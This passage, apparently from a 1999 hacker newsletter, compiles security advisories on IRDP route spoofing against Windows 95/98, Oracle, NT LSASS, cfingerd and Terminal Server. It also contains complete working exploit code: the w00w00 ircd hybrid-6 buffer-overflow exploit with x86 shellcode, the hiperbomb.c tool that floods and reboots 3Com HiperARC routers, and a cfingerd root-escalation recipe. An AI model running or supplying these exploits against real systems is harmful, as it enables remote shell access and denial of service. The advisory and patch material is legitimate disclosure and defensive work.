in the middle. By sitting in the middle, the attacker can act as a proxy between the victim and the end host. The victim, while thinking that they are connected directly to the end host, they are actually connected to the attacker, and the attacker is connected to the end host and is feeding the information through. If the connection is to a secure webserver that uses SSL, by sitting in the middle, the attacker would be able to intercept the traffic, unencrypted. A good example of this risk is on-line banking; an attacker playing man-in-the-middle would be able to intercept all of the banking information that is relayed, without the victim's knowledge. This is just a generic oversimplified scenario, there are obvious issues with certificates that the attacker would have to deal with if attempting this scenario. * For this to work, and attacker must be on the * same network as the victim. Denial of Service: Remote attackers can spoof these ICMP packets and remotely add bad default-route entries into a victims routing table. Because the victim's system would be forwarding the frames to the wrong address, it will be unable to reach other networks. Unfortunately, DHCP has quickly become popular and is relied upon in most companies. In some cases, such as cable & *DSL modems, users are required to use DHCP. Because of the large number of vulnerable systems, and the fact that this attack will penetrate firewalls that do not stop incoming ICMP packets, this Denial of Service attack can become quite severe. It should be noted that the above attacks are documented in Section 7, of RFC 1256. However, the RFC states states that the attacks are launched by an attacker on the same network as the victim. In the Denial of Service attack, this is not the case; an attacker can spoof IRDP packets and corrupt the routing tables on systems that are on remote networks. While these attacks are not new, the fact that Windows95/98 DHCP clients have been vulnerable for years, is. On systems running SunOS & Solaris, it is easy to find documentation on IRDP by looking at the startup scripts or manpages. On Windows95/98, however, information has only become recently available in the Knowledge Bank. III. Technical Details ---------------------- Upon startup, a system running MS Windows95/98 will always send 3 ICMP Router Solicitation packets to the 224.0.0.2 multicast address. If the machine is NOT configured as a DHCP client, it ignores any Router Advertisements sent back to the host. However, if the Windows machine is configured as a DHCP client, any Router Advertisements sent to the machine will be accepted and processed. Once an Advertisement is received, Windows checks to see how many Gateway entries the packet contains. If the packet contains only 1 entry, it checks to make sure the IP source address of the Advertisement is inside the hosts subnet. If it is, the Router Address entry inside the advertisement is checked to see that it is also within the host's subnet. If so, a new default route entry is added. If the address is outside the subnet, it the advertisement is silently ignored. If a host receives a Router Advertisment that contains 2 or more Router Addresses, the host will processes the packet even though the IP source address is not local. If the host finds a Router Address inside the advertisement that is inside the host's subnet, it will add a default route entry for it. Because the host does not care about the IP source address of the Advertisement as long as it has more than one entry, attackers can now create bogus IRDP packets that will bypass anti-spoofing filters. Before the host can add a new default route entry, it has to determine the route metric. On Windows95/98, normal default route entries obtained from a DHCP server have a metric of 1. In order to determine the metric for the default route entry obtained via IRDP, the Windows host subtracts the Advertisement's Preference value from 1000. By creating an ICMP Router Advertisement with a preference of 1000, the default gateway route added will have a metric of 0, making it the preferred default route. By adjusting the Lifetime value in the advertisement, an attacker can adjust how many seconds the gateways are valid for. DHCP Vendor Option #31, "Perform Router Discovery" has no effect on disabling this. If you configure your DHCP server to implicitly disable Router Discovery, the vulnerable Window95/98 hosts will ignore this, and continue to update their routing tables with information gleemed via IRDP. IV. Fixes / Work-arounds ------------------------ Firewall / Routers: Block all ICMP Type 9 & Type 10 packets. This should protect against remote Denial of Service attacks. Windows95/98: The Microsoft Knowledge Base contains an article that gives info on how to disable IRDP. It can be found at: http://support.microsoft.com/support/kb/articles/q216/1/41.asp Brief Summary of article: IRDP can be disabled manually by adding "PerformRouterDiscovery" value name and setting it to a dword value of 0, under the following registry key(s): HKLM\System\CurrentControlSet\Services\Class\NetTrans\#### Where #### is the binding for TCP/IP. More than one TCP/IP binding may exist. Solaris: Configure your host to obtain a default gateway through DHCP, static routes, or via the /etc/defaultrouter file. For more information on IRDP refer to in.rdisc's man-page. V. Detection ------------- L0pht has released a NFR Intrusion Detection Module to detect both Router Solicitations and Advertisements. You can find it at: http://www.l0pht.com/NFR NFR information can be found at http://www.nfr.net VI. Source Code ----------- L0pht is making available Proof-of-Concept code that will let individuals test their systems & firewalls. The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz Usage is fairly straight forward: Usage: rdp -v -l -s -d -p -t -i -S -D -R -r -v verbose -l listen mode -s send mode -d -n -I -p -t -i -S -D -R -r Misc software notes: Listen Mode: Software listens for ICMP Router Solicitations. If the '-s' flag is specified as well, the software will answer the Solicitations with ICMP Router Advertisements. Preference: If the preference is not specified, it will use a default of 1000, which will give the default route a metric of 0 on affected Windows systems. 2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the @HWA 71.0 Setuid problem in Oracle ~~~~~~~~~~~~~~~~~~~~~~~~~ Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i Message-ID: <19990817092232.B7591@securityfocus.com> Date: Tue, 17 Aug 1999 09:22:32 -0700 Reply-To: aleph1@SECURITYFOCUS.COM Sender: Bugtraq List From: Elias Levy Subject: Security Bug in Oracle X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM Content-Length: 1179 Subject: Security Bug in Oracle X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM Content-Length: 1179 Sender: jason.axley@attws.com Subject: Security Bug in Oracle ---------- Forwarded message ---------- Date: Mon, 16 Aug 1999 23:51:53 +0200 From: Gilles PARC Subject: Security Bug in Oracle Hi Listers, I discover a new security problem with Oracle on Unix. Once again, it's with a setuid program. Do not confuse with a similar problem corrected by ORACLE some month ago with a patch called setuid_patch.sh. NEW PROBLEM : if you have installed Oracle Intelligent agent, you will find in $ORACLE_HOME/bin a program called dbsnmp. This program is setuid root and was DELIBERATELY EXCLUDED by Oracle in the forementioned patch. The security hole resides in the fact that this program executes a tcl script ( nmiconf.tcl ) located by default in $ORACLE_HOME/network/agent/config. Needless to say that you can easily bypass this default and have your own malicious nmiconf.tcl script run under root privileges. I verify this on HP-UX 10.20 with Oracle 7.3.3 and 8.0.4.3 on AIX 4.3 with Oracle 8.0.5.1 But it's probably Unix generic. Regards Gilles Parc Email : gparc@mail.dotcom.fr carpe diem !! ----- End forwarded message ----- -- Elias Levy Security Focus http://www.securityfocus.com/ @HWA 72.0 Vulnerability In LSA on Windows NT SP5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ----- Forwarded message from "Galipeau, William" ----- Date: Thu, 12 Aug 1999 17:28:48 -0400 From: "Galipeau, William" Subject: FW: Vulnerability In LSA on Windows NT SP5 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM I inadvertently sent this to the wrong address. My apologies. -----Original Message----- From: Galipeau, William Sent: Thursday, August 12, 1999 10:15 AM To: russ.cooper@rc.on.ca Subject: Vulnerablity In LSA on Windows NT SP5 Russ, A few months ago I found a vulnerability in NT 4.0 configured with SP5. I downloaded a trial copy of Network Associates Cyber Cop version 5.0. I ran a scan using all the Denial of Service based attack options. All failed but one: the "Windows NT- LSASS.EXE Denial of Service attack." When you run a scan on a NT 4.0 machine configured with SP5 (with or without the LSA3 hot fix) utilizing this option, the target machine will lock, not allowing users to authenticate to the server remotely or locally. The only way to correct the problem is to physically reboot the server. Also, to make matters worse, the audit logs on the target server do not illustrate where the attacks were launched from. Because Cyber Cop allows you to run this scan on any IP or any host of IPs, an intruder could attack a large base of servers in a relatively short amount of time without leaving a reliable audit trail. I reported this issue to Microsoft on 6/23/99 (I have an incident number). I have been following up with Microsoft, but they have been reluctant to provide much detail on the issue. Hopefully you can help motivate them. Thanks ----- End forwarded message ----- @HWA 73.0 w00w00's efnet ircd advisory (exploit included) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [http://www.w00w00.org, comments to shok@dataforce.net] SUMMARY efnet ircd hybrid-6 (up to beta 58) have a vulnerability that can allow remote access to the irc server. In most cases, you'll gain privileges of the 'irc' user. COMMENTS This vulnerability was discovered by jduck and stranjer of w00w00 at least 2 months ago. After discussing the vulnerability, it was reported to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable irc servers or they didn't take these 2 months to fix themselves (note: we didn't wait that long on purpose.. we were just sidetracked with a million other things). DESCRIPTION The vulnerability is in the invite handling code (m_invite). In a channels with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can overflow its boundaries by up to 15 bytes. Steps: 1. Client 1 (9chars!10chars@trivial) joins #199chars 2. Client 2 (trivial!trivial@trivial) joins #199chars 3. Client 1 sets mode #199chars +pio Client 2 4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars Note: client 1 and client 3 should _not_ be from the same host. With our exploit, client 3 (compile/run hostname.c) first, then compile/run ircdexp.c. Client #1's server = vulnerable irc server (such as irc.arpa.com) Client #2's server = trivial Client #3's server = ComStud irc server (such as irc.prison.net), because it allows shellcode chars in hostname Using the following spoofed host (59 chars): shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA [The ComStud ircd will check for a '.'] Here, EIP = 0x41414141 (AAAA). The other registers are negligable. The hostlen is actually 63 bytes, but for this specific overflow, EIP is overwritten at buf[54-58]. We have to take stdout/stdin descriptors into consideration. We are very limited in size (only have 54 bytes for shellcode), so we can't fit bind shellcode. Instead, we took the standard Linux x86 shellcode, dropped exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the first argument passed to m_invite). Since we only have 54 bytes to work with, we can't fit code in to close stdout and dup cptr->fd, so output will be sent to whatever terminald ircd was started from. If you do not wish for the output to be seen, redirect everything (via '>') /dev/null. As for how to go about spoofing, you have options: 1) Use the old DNS poison caching method 2) Use custom "fake binds" that will just pass on your shellcode as a hostname in response to a DNS query (idea from nyt). Option #2 is the approach we will take (hostname.c generates the shellcode we'll use). This will work fine as long as you IP/hostname hasn't already been cached. Because these "fake binds" are pretty popular (or have been in the past), they should be easy to come by and are outside the scope of this advisory. So full steps are, client with the spoofed hostname, connect to a ComStud ircd server (such as irc.prison.net), another client join the arbitrary client, and another client join the target ircd hybrid-6 server (such as irc.arpa.com). Once the channel is +pi (and your channel, ident, username, etc. all the right length), invite the client with the spoofed hostname. Fine-tune until you have root. Thanks to: stranjer and jduck for their input and discovery of this vulnerability. People that deserve hellos: Mike (mike@eEye.com), vacuum (vacuum@technotronic.com), awr (andrewr@rot26.net), dmess0r (dmessor@el8.org). -- Matt Conover (Shok) & w00w00 Security Team invitee: (hostname.c) /* * ircd hybrid-6 exploit (invitee side) * Matt Conover (Shok) & w00w00 Security Team * * This is used to generate the shellcoded hostname, which is used to */ #include #include #include #include #include #include #define ERROR -1 #define OFFSET 0 #define HOSTLEN 59 /* this is the just the right len to overwrite eip */ unsigned long getesp(); /* * Linux x86 shellcode, for a one-sided (input only) shell * Shellcode close's and dup's stdin to your ircd sockfd, allowing * you to give input. If we had more room for shellcode, we could make it * a full duplex shell (two-sided). Unless you redirect output, it will * be sent to the terminal that ran ircd. */ char shellcode[] = "\xeb\x28\x5e\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x8b\x7e\x0d\x8a\x5f\x38" "\xb0\x29\xcd\x80\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh"; /* --------------------------------------- */ unsigned long getesp() { __asm__("movl %esp,%eax"); /* return value stored in %eax with C */ } int main(int argc, char **argv) { FILE *filefd; char *argstr, *buf, *bufptr; long addr; int i, bufsize = HOSTLEN, offset = OFFSET; if (argc > 3) { fprintf(stderr, "Usage: %s [bufsize] [offset]\n", argv[0]); exit(ERROR); } if (argc == 2) bufsize = atoi(argv[2]); if (argc == 3) offset = atoi(argv[3]); if (bufsize < HOSTLEN) { printf("bufsize too small.. setting to minimum bufsize (%d)\n", HOSTLEN); bufsize = HOSTLEN; } buf = malloc(bufsize+1); if (buf == NULL) { fprintf(stderr, "Error malloc'ing memory: %s\n", strerror(errno)); exit(ERROR); } addr = getesp() - offset; printf("stack ptr (0x%lx) - offset (%d) = 0x%lx\n", addr - offset, offset, addr); bufptr = buf; i = bufsize - (strlen(shellcode) + 5), memset(buf, 0x90, i); bufptr = buf + i, memcpy(bufptr, shellcode, strlen(shellcode)); bufptr = buf + strlen(shellcode) + i, *bufptr++ = '.'; memcpy(bufptr, &addr, sizeof(addr)); buf[bufsize] = '\0'; printf("strlen(buf) = %d, strlen(shellcode) = %d\n\n", strlen(buf), strlen(shellcode)); printf("%s\n", buf); } inviter:(ircdexp.c) /* * ircd hybrid 6 exploit (inviter side) * Copyright (C) May 1999, Matt Conover & w00w00 Security Team * * When a channel is +pi with more than one op in it, it will send a * message to all other ops in the the channel with the following format: * INVITE: %s (%s invited %s [%s@%s]) * * The steps to exploit this are as follows (requires 3 clients): * 1. Client A (9chars!10chars@trivial) joins #199chars * 2. Client B (trivial!trivial@trivial) joins #199chars * 3. Client A sets mode #199chars +pio Client B * 4. Client A invites Client C (9chars!10chars@58chars) to #199chars * * The code on the invitee's side is done separately. */ #include #include #include #include #include #include #include #include #include #define SAME 0 #define ERROR -1 #define BUFSIZE 512 #define HOSTLEN 63 #define CHANLEN 200 /* NOTE: This code is not pretty, but tracking 3 clients isn't either. */ struct servstruct { char *server; int port; }; struct servstruct server[2] = { { "irc.arpa.com", 6667 }, { "irc.freei.net", 6667 } }; char nick[3][10] = { "clientaaa", "clientbbb", "clientccc" }; int sockfd[2]; char srchost[HOSTLEN+1]; char channel[CHANLEN+1]; char readbuf[BUFSIZE], writebuf[BUFSIZE]; struct sockaddr_in servsin; /* ---------------------------------------- */ void exploit(); void checkerrors(); void makeconn(int fd, char *nick, char *host, int port); char *inet_ntoa(struct in_addr in); int main(int argc, char **argv) { register int clients; struct hostent *hostent; if (gethostname(srchost, HOSTLEN) == ERROR) { fprintf(stderr, "error with gethostname(): %s\n", strerror(errno)); fprintf(stderr, "continuing anyway.. but likely won't work\n"); strcpy(srchost, "UNKNOWN"); } for (clients = 0; clients < 2; clients++) { hostent = gethostbyname(server[clients].server); if (hostent == NULL) { fprintf(stderr, "gethostbyname() error (client %d): ", clients, strerror(h_errno)); exit(ERROR); } servsin.sin_family = AF_INET; servsin.sin_port = htons(server[clients].port); memset(&servsin.sin_zero, 0, sizeof(servsin.sin_zero)); memcpy(&servsin.sin_addr, hostent->h_addr, hostent->h_length); sockfd[clients] = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); makeconn(sockfd[clients], nick[clients], server[clients].server, server[clients].port); } printf("Calling exploit()..\n"); exploit(); printf("All exploit work has been completed.\n"); for (clients = 0; clients < 3; clients++) close(sockfd[clients]); return 0; } /* connect and login to irc server */ void makeconn(int fd, char *nick, char *host, int port) { register int clients; printf("Connecting to %s (%s) [port %d] as:\n%s!%s@%s\n\n", host, (char *)inet_ntoa(servsin.sin_addr), port, nick, "AAAAAAAAAA", srchost); if (connect(fd, (struct sockaddr *)&servsin, sizeof(struct sockaddr_in)) == ERROR) { fprintf(stderr, "error connecting to %s: %s\n", host, strerror(errno)); exit(ERROR); } memset(readbuf, 0, sizeof(readbuf)); memset(writebuf, 0, sizeof(writebuf)); snprintf(writebuf, BUFSIZE-1, "NICK %s\n", nick); printf("Sending NICK info for %s\n", nick); if (send(fd, writebuf, strlen(writebuf), 0) == ERROR) { fprintf(stderr, "error with send() (%s): %s\n", nick, strerror(errno)); for (clients = 0; clients < 2; clients++) close(sockfd[clients]); exit(ERROR); } snprintf(writebuf, BUFSIZE-1, "USER AAAAAAAAAA none none :w00w00\n"); printf("Sending USER info for %s\n", nick); if (send(fd, writebuf, strlen(writebuf), 0) == ERROR) { fprintf(stderr, "error with send() (%s): %s\n", nick, strerror(errno)); for (clients = 0; clients < 2; clients++) close(sockfd[clients]); exit(ERROR); } sleep(5); /* make sure we give sockbuf enough time to fill up */ if (clients < 2) { channel[0] = '#'; memset(channel+1, 'A', CHANLEN-1); channel[CHANLEN] = '\0'; memset(writebuf, 0, sizeof(writebuf)); snprintf(writebuf, BUFSIZE-1, "JOIN %s\n", channel); printf("\n[%s] /JOIN'ing channel\n", nick); if (send(fd, writebuf, strlen(writebuf), 0) == ERROR) { fprintf(stderr, "error with send() (client %d): %s\n", clients, strerror(errno)); for (clients = 0; clients < 2; clients++) close(fd); exit(ERROR); } } printf("\n[Client %d] Checking for login errors...\n", clients); checkerrors(); printf("[Client %d] Successfuly logged in\n\n", clients); } /* check for errors in login */ void checkerrors() { char *ptr; int res = ERROR; register int clients; for (clients = 0; clients < 2; clients++) { while (res == sizeof(readbuf) - 1) { res = recv(sockfd[clients], readbuf, sizeof(readbuf)-1, 0); if (res == ERROR) { fprintf(stderr, "error reading socket (client %d): %s\n", clients, strerror(errno)); for (clients = 0; clients < 2; clients++) close(sockfd[clients]); exit(ERROR); } else { if (clients == 0) { ptr = strstr(readbuf, "hybrid-"); if ((ptr != NULL) && (strncmp(ptr, "hybrid-6", 8) != SAME)) { fprintf(stderr, "ERROR (client %d): " "the server must be a hybrid-6 ircd\n", clients); for (clients = 0; clients < 2; clients++) close(sockfd[clients]); exit(ERROR); } } ptr = strstr(readbuf, ":ERROR"); if (ptr != NULL) { fprintf(stderr, "error with irc server (client %d):\n%s\n", clients, ptr); for (clients = 0; clients < 3; clients++) close(sockfd[clients]); exit(ERROR); } } } } } /* main part of program */ void exploit() { register int clients; memset(writebuf, 0, sizeof(writebuf)); snprintf(writebuf, BUFSIZE-1, "MODE %s +ipo %s\n", channel, nick[1]); printf("%s will now attempt to set channel modes\n", nick[0]); /* Client A sets modes and ops Client B */ if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR) { fprintf(stderr, "error with send(): %s\n", strerror(errno)); for (clients = 0; clients < 2; clients++) close(clients[sockfd]); exit(ERROR); } sleep(3), checkerrors(); /* check to see if we had a race condition */ printf("\nAttempting to invite %s (the final item)..\n", nick[2]); memset(writebuf, 0, sizeof(writebuf)); snprintf(writebuf, BUFSIZE-1, "INVITE %s %s\n", nick[2], channel); /* ircd ownage/crash will occur during after this send() */ if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR) { fprintf(stderr, "error with send() (client %d): %s\n", clients, strerror(errno)); for (clients = 0; clients < 2; clients++) close(sockfd[clients]); exit(ERROR); } /* should have stopped/crashed on server-side by now */ checkerrors(); } @HWA 74.0 hiperbomb.c - reboot a hiperarc router ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hello, The attached program will reboot a 3com HiperARC. I made an attempt to contact 3com before posting this report, however, I received no response. By flooding the telnet port of a 3com HiperARC using the provided program, the HiperARC unconditionally reboots. This program is effective over all interfaces, including a dialup. Regards, Jonathan Chapman Director of Network Security FIRST Incorporated jchapman@1st.net www.1st.net hiperbomb1.c /* --------------------------------------------------------------------- * hiperbomb2.c - Reboots HiperARC faster. * --------------------------------------------------------------------- * (c) 1999 - Jonathan Chapman * --------------------------------------------------------------------- * Sends a high volume of IACs which eventually leads to a reboot of the * HiperARC. Brief testing indicated that this problem is most likely * specific to sending IACs rather than any other type of data. Further * research has shown that specific IAC patterns are more likely to cause * a reboot. In this example I use one of the most efficient combinations * I have discovered. Through my testing it usually required at least * 60,000 packets to cause the HiperARC to reboot. * --------------------------------------------------------------------- */ #include #include #include #include #include #include char *chassis; int sockfd, num_of_tries; void connect_to_chassis(char *name) { struct hostent *host; struct sockaddr_in remote; host = gethostbyname(name); if(!host) { fprintf(stderr, "Cannot resolve host %s.\n", name); exit(3); } sockfd = socket(AF_INET, SOCK_STREAM, 0); if(sockfd < 0) { fprintf(stderr, "Cannot obtain descriptor.\n"); exit(4); } remote.sin_family = AF_INET; remote.sin_addr = *(struct in_addr *)*host->h_addr_list; remote.sin_port = htons(23); connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)); return; } void send_iacs() { unsigned char reply[3] = {254, 36, 185}; unsigned int k; for(k = 0; k < num_of_tries; k++) { write(sockfd, reply, 3); } } int main(int ac, char **av) { if(ac < 3) { fprintf(stderr, "Syntax: %s \n", av[0]); fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n"); exit(2); } chassis = av[1]; num_of_tries = atoi(av[2]); fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", chassis, num_of_tries); connect_to_chassis(chassis); send_iacs(); fprintf(stderr, "Attack complete.\n"); exit(0); } @HWA 75.0 HP Security Bulletins Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://europe-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== Digest Name: Daily Security Bulletins Digest Created: Thu Aug 12 15:00:02 METDST 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9906-098 Security Vulnerability in VVOS NES The documents are listed below. ------------------------------------------------------------------------------- Document ID: HPSBUX9906-098 Date Loaded: 19990811 Title: Security Vulnerability in VVOS NES --------------------------------------------------------------------------- **REVISED01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00098, 10 June 99 Last Revised: 11 August 1999 --------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Netscape Enterprise Server cannot correctly process some URL's. PLATFORM: HP9000 Series 700/800 running: HP-UX 10.24 (VVOS) with VirtualVault A.02.00 HP-UX 10.24 (VVOS) with VirtualVault A.03.00 HP-UX 10.24 (VVOS) with VirtualVault A.03.01 HP-UX 10.24 (VVOS) with VirtualVault A.03.50 DAMAGE: Web Server cannot correctly process some URLs. SOLUTION: Apply the appropriate patches to correct the problem: **REVISED01** Both HP-UX 10.24 with VirtualVault A.02.00 US/Canada, and HP-UX 10.24 with VirtualVault A.02.00 International: PHCO_18615 libsecalarm cumulative patch Please note this patch has dependencies. ----->> PHSS_19389 VirtualVault:2.00:NES:NSAPI Both HP-UX 10.24 with VirtualVault A.03.00 US/Canada, and HP-UX 10.24 with VirtualVault A.03.00 International: PHCO_18615 libsecalarm cumulative patch Please note this patch has dependencies. ----->> PHSS_19388 VirtualVault:3.00:NES:NSAPI Both HP-UX 10.24 with VirtualVault A.03.01 US/Canada, and HP-UX 10.24 with VirtualVault A.03.01 International: PHCO_18615 libsecalarm cumulative patch Please note this patch has dependencies. ----->> PHSS_19387 VirtualVault:3.01:NES:NSAPI Both HP-UX 10.24 with VirtualVault A.03.50 US/Canada, and HP-UX 10.24 with VirtualVault A.03.50 International PHCO_18615 libsecalarm cumulative patch Please note this patch has dependencies. ----->> PHSS_19376 VirtualVault:3.50:NES:NSAPI AVAILABILITY: All patches are available now. CHANGE SUMMARY: Defects in previous patches discovered. ----------------------------------------------------------------------- I. A. Background A recent bugtraq posting contained some inaccurate information regarding Hewlett-Packard Company's VirtualVault Operating System. This problem is not TGA nor TGP related; further, VVOS does not have a B1 or B2 level of certification. Under certain conditions, Netscape Enterprise Server (NES) fails to properly process web requests. This activity has been observed in the NES bundled with Praesidium VirtualVault releases A.02.00, A.03.00, A.03.01 and A.03.50. B. Fixing the problem This problem can be completely eliminated by applying the recommended patches mentioned above. It can be resolved temporarily by commenting out or removing the "vault-auth-log" AddLog line from the Netscape Enterprise Server's obj.conf file. Upon patching the system, automatic reboot is performed. The affected filesets are: VaultNES.NES-VAULT VaultTS.INES-COMMON. C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ -----End of Document ID: HPSBUX9906-098-------------------------------- @HWA 76.0 cfingerd exploit ~~~~~~~~~~~~~~~~ Bugtraq Security Advisory ========================= A serious bug in cfingerd before version 1.4.0 has been reported. It is present in all versions of cfingerd from 1.2.0 up to any version of 1.3.2. If configured accordingly this bug enables any local user to execute random programs with root priviledges. Although I haven't been quite verbose with development of cfingerd, Ken Hollis (the original author) has handed maintainership over to me a while ago. I did some development and fixed some security related bugs, but never made an official release. This is done now. Affected systems ---------------- All systems running a version of cfingerd beginning with version 1.2.0 and before version 1.4.0 are affected. You are safe if you have disabled ALLOW_EXECUTION in your cfingerd.conf file in section "internal_config", i.e. that file contains a line "-ALLOW_EXECUTION". This is the default configuration of this package. If you use the default cfingerd.conf file as shipped with the distribution you are safe. You should still upgrade. Recommended action ------------------ 1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf file. 2nd Upgrade to the most recent version of cfingerd 1.4.0 to be found at the primary site ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/ or ftp://metalab.unc.edu/pub/Linux/system/network/finger/ . Exploit ------- The exploit is quite simple. Thanks go to Tadek Knapik who has informed me. You need to add $exec /tmp/relinq to your ~/.plan file. Then compile the following relinq.c file in /tmp: #include void main() { printf("Root exploit test\n"); setregid(0, 0); setreuid(0, 0); printf("User: %d, group: %d.\n", getuid(), getgid()); } Checksum -------- File: ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/cfingerd-1.4.0.tar.gz MD5sum: dcc25e89ba1dad6497365429b1db2909 Regards, Joey -- Experience is something you don't get until just after you need it. @HWA 77.0 Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-028) -------------------------------------- Patch Available for "Terminal Server Connection Request Flooding" Vulnerability Originally Posted: August 09, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability that could pose a denial-of-service threat to Microsoft(r) Windows NT(r) Terminal Servers. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-028faq.asp Issue ===== When a request to open a new terminal connection is received by a Terminal Server, the server undertakes a resource-intensive series of operations to prepare for the connection. It does this before authenticating the request. This would allow an attacker to mount a denial of service attack by levying a large number of bogus connection requests and consuming all memory on the Terminal Server. This vulnerability could be exploited remotely if connection requests are not filtered. In extreme cases, the server could crash in the face of such an attack; in other cases, normal processing would return when the attack ceased. The patch works by causing the server to require authentication before processing the connection request. Affected Software Versions ========================== - Microsoft Windows NT Server 4.0, Terminal Server Edition Patch Availability ================== - Microsoft Windows NT Server 4.0, Terminal Server Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes /usa/NT40tse/hotfixes-postSP4/Flood-fix/ NOTE: Line breaks have been added to the above URL for readability. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-028: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-028faq.asp. - Microsoft Knowledge Base (KB) article Q238600, Multiple Connection Requests Promote Denial of Service Attack, http://support.microsoft.com/support/kb/articles/q238/6/00.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible.) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges the ISS X-force (http://www.iss.net) for discovering this vulnerability and working with us to alert customers about it. Revisions ========= - August 09, 1999: Bulletin Created. -------------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. 